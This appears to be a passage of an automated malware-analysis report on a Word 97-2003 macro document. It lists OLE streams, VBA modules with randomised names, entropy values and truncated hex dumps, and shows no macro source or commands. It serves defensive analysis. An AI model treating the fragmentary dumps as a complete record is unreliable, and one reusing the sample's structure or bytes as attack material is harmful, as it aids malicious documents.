                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm5, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 f9 39 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Vhr7vb1s1hgs
                                                                                                                              VBA File Name:Vhr7vb1s1hgs
                                                                                                                              Stream Size:681
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 11 c0 94 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VBA Code

                                                                                                                              Streams

                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                              General
                                                                                                                              Stream Path:\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:114
                                                                                                                              Entropy:4.2359563651
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                              General
                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:4096
                                                                                                                              Entropy:0.252421588676
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                                                                                                                              General
                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:496
                                                                                                                              Entropy:3.89869601257
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                                                                                                              Stream Path: 1Table, File Type: data, Stream Size: 7231
                                                                                                                              General
                                                                                                                              Stream Path:1Table
                                                                                                                              File Type:data
                                                                                                                              Stream Size:7231
                                                                                                                              Entropy:5.85333738879
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                              Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                              Stream Path: Data, File Type: data, Stream Size: 99195
                                                                                                                              General
                                                                                                                              Stream Path:Data
                                                                                                                              File Type:data
                                                                                                                              Stream Size:99195
                                                                                                                              Entropy:7.38970239713
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:{ . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . . . . . . D . . . . . S . . F . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . .
                                                                                                                              Data Raw:7b 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                                                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECT
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:894
                                                                                                                              Entropy:5.30543445279
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
                                                                                                                              Data Raw:49 44 3d 22 7b 39 45 37 34 42 46 36 30 2d 37 31 39 39 2d 34 42 31 32 2d 42 37 34 33 2d 34 34 41 38 46 42 45 45 44 32 33 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d
                                                                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECTwm
                                                                                                                              File Type:data
                                                                                                                              Stream Size:278
                                                                                                                              Entropy:3.75500935024
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
                                                                                                                              Data Raw:44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 00 44 00 6b 00 35 00 61 00 74 00 74 00 30 00 63 00 75 00 5f 00 39 00 6a 00 73 00 62 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72
                                                                                                                              Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62034133633
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62970308443
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.63438395848
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62402723855
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62202697924
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
